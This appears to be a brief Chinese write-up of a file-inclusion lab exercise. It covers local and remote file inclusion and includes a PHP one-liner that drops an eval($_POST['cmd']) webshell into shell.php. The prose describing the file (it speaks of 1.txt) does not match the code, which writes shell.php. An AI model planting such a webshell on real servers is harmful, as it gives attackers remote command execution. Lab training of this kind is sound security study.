本地文件包含
1.来到关卡随便点击一个提交
可以发现这里可以读取文件
这是1.txt内容
能读取到上一级文件那么也就可以读取本地文件
上传一个jpg文件
拿去连就ok了
远程包含
包含写木马的文件
该文件内容如下,其作用是在fi_remote.php文件的同级目录下新建一个文件1.txt,并将一句话木马写入shell.php
<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST['cmd']);?>")?>
然后读取这个txt文件写入shell.php这里读完后页面没有显示我们直接连一下看看
连接成功说明写进去了
